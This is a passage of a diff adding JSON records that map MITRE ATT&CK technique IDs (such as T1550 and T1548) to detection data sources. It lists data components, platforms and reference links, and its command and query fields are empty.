"description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "windows registry key" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1550.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential usage", + "description": "A web credential was used.", + "source_data_element": "user", + "relationship": "attempted to use", + "target_data_element": "web credential" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4", + "https://auth0.com/docs/tokens/access-tokens" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1550.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential usage", + "description": "A web credential was used.", + "source_data_element": "user", + "relationship": "attempted to use", + "target_data_element": "web credential" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4", + "https://auth0.com/docs/tokens/access-tokens" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1550", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "web credential", + "definition": "Data describing activity around web authentication credentials such as tokens and cookies", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "web credential usage", + "description": "A web credential was used.", + "source_data_element": "user", + "relationship": "attempted to use", + "target_data_element": "web credential" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory credential request", + "description": "A user requested active directory credentials, such as a ticket or token.", + "source_data_element": "user", + "relationship": "requested", + "target_data_element": "ad credential" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4", + "https://auth0.com/docs/tokens/access-tokens" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1548.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1548", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1547.008", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1547.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + 